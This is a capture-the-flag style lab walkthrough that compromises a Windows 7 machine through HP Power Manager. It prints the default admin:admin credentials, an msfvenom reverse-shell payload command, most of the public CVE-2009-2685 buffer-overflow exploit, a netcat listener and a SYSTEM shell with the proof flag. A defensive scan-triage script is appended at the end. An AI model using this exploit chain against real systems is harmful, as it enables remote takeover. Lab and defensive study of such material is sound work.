## Enum

```
PORT      STATE SERVICE            REASON          VERSION
80/tcp    open  http               syn-ack ttl 125 GoAhead WebServer
| http-methods:
|_  Supported Methods: GET HEAD
| http-title: HP Power Manager
|_Requested resource was http://192.168.188.45/index.asp
|_http-server-header: GoAhead-Webs
135/tcp   open  msrpc              syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       syn-ack ttl 125 Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server? syn-ack ttl 125
|_ssl-date: 2025-04-25T17:45:49+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=kevin
| Issuer: commonName=kevin
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2025-04-24T17:38:22
| Not valid after:  2025-10-24T17:38:22
| MD5:   1dabab52c6a9826cb055632101c13807
|_SHA-1: 4bfdeda941de4e30e1b8ce452fe1424e13a7fdbd
3573/tcp  open  tag-ups-1?         syn-ack ttl 125
49152/tcp open  msrpc              syn-ack ttl 125 Microsoft Windows RPC
49153/tcp open  msrpc              syn-ack ttl 125 Microsoft Windows RPC
49154/tcp open  msrpc              syn-ack ttl 125 Microsoft Windows RPC
49155/tcp open  msrpc              syn-ack ttl 125 Microsoft Windows RPC
49158/tcp open  msrpc              syn-ack ttl 125 Microsoft Windows RPC
49160/tcp open  msrpc              syn-ack ttl 125 Microsoft Windows RPC
Service Info: Host: KEVIN; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows 7 Ultimate N 7600 (Windows 7 Ultimate N 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::-
|   Computer name: kevin
|   NetBIOS computer name: KEVIN\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-04-25T10:45:41-07:00
| nbstat: NetBIOS name: KEVIN, NetBIOS user: <unknown>, NetBIOS MAC: 0050569ed060 (VMware)
| Names:
|   KEVIN<00>            Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   KEVIN<20>            Flags: <unique><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| Statistics:
|   0050569ed0600000000000000000000000
|   0000000000000000000000000000000000
|_  0000000000000000000000000000
| smb2-security-mode:
|   210:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2025-04-25T17:45:41
|_  start_date: 2025-04-25T17:39:14
|_clock-skew: mean: 1h45m00s, deviation: 3h30m00s, median: 0s
```

### 445 SMB

- null auth
  - permitted
  - cannot list shares

### 80 HTTP

- HP Power Manager at http://192.168.188.45/Contents/index.asp
- default credentials
  - `admin:admin` yields instant access
- service version: `4.2` (Build 7)

```
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/kevin]-[192.168.188.45]
╰─> searchsploit "hp power manager"
------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                          |  Path
------------------------------------------------------------------------ ---------------------------------
Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information | php/webapps/23163.txt
Hewlett-Packard (HP) Power Manager Administration - Remote Buffer Overf | windows/remote/16785.rb
Hewlett-Packard (HP) Power Manager Administration Power Manager Adminis | windows/remote/10099.py
HP Power Manager - 'formExportDataLogs' Remote Buffer Overflow (Metaspl | cgi/remote/18015.rb
------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
```

I dunno, googling the above-mentioned build reveals a couple of buffer overflows:

```
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/kevin]-[192.168.188.45]
╰─> searchsploit -m 10099
  Exploit: Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow
      URL: https://www.exploit-db.com/exploits/10099
     Path: /opt/exploitdb/exploits/windows/remote/10099.py
    Codes: CVE-2009-2685
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /targets/kevin/10099.py
```

We'll go about generating the payload for the exploit:

```sh
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.231 LPORT=3573 -f python -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" -e x86/alpha_mixed
```

And paste that into the exploit where appropriate:

```python
#!/usr/bin/python
# HP Power Manager Administration Universal Buffer Overflow Exploit
# CVE 2009-2685
# Tested on Win2k3 Ent SP2 English, Win XP Sp2 English
# Matteo Memelli ryujin __A-T__ offensive-security.com
# www.offensive-security.com
# Spaghetti & Pwnsauce - 07/11/2009
#
# ryujin@bt:~$ ./hppowermanager.py 172.16.30.203
# HP Power Manager Administration Universal Buffer Overflow Exploit
# ryujin __A-T__ offensive-security.com
# [+] Sending evil buffer...
# HTTP/1.0 200 OK
# [+] Done!
# [*] Check your shell at 172.16.30.203:4444 , can take up to 1 min to spawn your shell
# ryujin@bt:~$ nc -v 172.16.30.203 4444
# 172.16.30.203: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [172.16.30.203] 4444 (?) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
# C:\WINDOWS\system32>

# Python 2 syntax (print statements); run it with python2.
import sys
from socket import *

print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__ offensive-security.com"

try:
    HOST = sys.argv[1]
except IndexError:
    print "Usage: %s HOST" % sys.argv[0]
    sys.exit()

PORT = 80
RET = "\xCF\xBC\x08\x76"  # 7608BCCF JMP ESP MSVCP60.dll
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
SHELL = "n00bn00b"
# the msfvenom -f python output (the SHELL += b"..." lines) is pasted in here
...
```

Start a handler:

```sh
rlwrap nc -lnvp 3573
```

We get a shell, but there's no flag lol....

## Privesc

Okay, this one was rather easy: the shell already runs as SYSTEM....

```
PS C:\Users\kevin\Desktop> whoami
nt authority\system
PS C:\Users\kevin\Desktop> cd /users/administrator
PS C:\users\administrator> dir


    Directory: C:\users\administrator


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d-r--          3/5/2010 12:26 AM            Contacts
d-r--          7/9/2020  7:24 PM            Desktop
d-r--          3/5/2010 12:26 AM            Documents
d-r--          3/5/2010 12:26 AM            Downloads
d-r--          3/5/2010 12:26 AM            Favorites
d-r--          3/5/2010 12:26 AM            Links
d-r--          3/5/2010 12:26 AM            Music
d-r--          3/5/2010 12:26 AM            Pictures
d-r--          3/5/2010 12:26 AM            Saved Games
d-r--          3/5/2010 12:26 AM            Searches
d-r--          3/5/2010 12:26 AM            Videos


PS C:\users\administrator> cd Desktop
PS C:\users\administrator\Desktop> ls


    Directory: C:\users\administrator\Desktop


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         4/25/2025 11:40 AM         34 proof.txt


PS C:\users\administrator\Desktop> cat proof.txt
0994a6b78e20067cf0e1379a8e36e145
PS C:\users\administrator\Desktop>
```

Done I suppose....
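As an added defender-side postscript that is not part of the original write-up: a small triage script that parses the nmap output from the Enum section (a constructed excerpt is embedded inline) and maps each weakness the scan exposed to a remediation item. The finding ids, the two regexes and the remediation wording are my own.

```python
import re
# Constructed excerpt of the nmap -sC -sV output from the Enum section; a real
# scan's full normal-output text is handed to triage() the same way.
SCAN = """\
80/tcp    open  http               syn-ack ttl 125 GoAhead WebServer
| http-title: HP Power Manager
445/tcp   open  microsoft-ds       syn-ack ttl 125 Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server? syn-ack ttl 125
| ssl-cert: Subject: commonName=kevin
| Issuer: commonName=kevin
| Signature Algorithm: sha1WithRSAEncryption
Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s+syn-ack ttl \d+\s*(.*)$")
CERT_RE = re.compile(r"Subject: commonName=(\S+)\n\| Issuer: commonName=(\S+)")

def parse_ports(text):
    """Map port -> (service, version banner) from the port table of nmap normal output."""
    ports = {}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports[int(m.group(1))] = (m.group(2), m.group(3).strip())
    return ports

def self_signed(text):
    m = CERT_RE.search(text)  # subject CN == issuer CN means a self-signed cert
    return bool(m) and m.group(1) == m.group(2)

# (finding id, predicate over the port map and the raw text, remediation note)
RULES = [
    ("hp-power-manager-exposed", lambda p, t: "http-title: HP Power Manager" in t,
     "Isolate or retire HP Power Manager; the 4.2 web UI has a public RCE (CVE-2009-2685)."),
    ("smb-signing-disabled", lambda p, t: "message_signing: disabled" in t,
     "Require SMB signing via Group Policy."),
    ("smb-guest-session", lambda p, t: "account_used: guest" in t,
     "Disable guest and null sessions."),
    ("rdp-self-signed-sha1-cert", lambda p, t: 3389 in p and self_signed(t) and "sha1With" in t,
     "Issue the RDP certificate from the internal CA with a SHA-2 signature."),
    ("windows7-rtm", lambda p, t: any("7600" in b for _, b in p.values()),
     "Build 7600 is Windows 7 RTM with no service pack; the host is unpatched and past end of life."),
]

def triage(text):
    """Return {finding id: remediation} for every rule that fires on the scan text."""
    ports = parse_ports(text)
    return {fid: fix for fid, pred, fix in RULES if pred(ports, text)}
```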